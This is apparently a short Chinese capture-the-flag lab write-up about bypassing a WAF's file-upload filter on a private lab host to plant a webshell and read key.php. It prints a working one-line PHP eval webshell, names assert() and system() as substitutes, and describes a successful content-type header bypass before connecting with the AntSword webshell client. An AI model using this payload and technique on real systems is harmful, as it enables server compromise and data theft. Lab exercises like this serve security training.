题目:通过你所学到的知识,测试其过WAF滤规则,突破上传获取webshell,答案就在根目录下key.php文件中。
先去上传1.php文件,里面编写一句话木马:<?php eval($_POST[c]);?>
1、通过抓包来获取内容,发现并没有上传成功
2、 通过后缀名绕过上传:失败
3、通过内容头部绕过:成功(也有可能屏蔽eval函数,使用system函数或者assert()函数)
去访问上传的路径:http://192.168.129.128:82/vulnerabilities/1.phtml
使用蚁剑webshell进行连接:http://192.168.129.128:82/vulnerabilities/1.phtml
进入webshell后台管理界面:
获取到key.php值;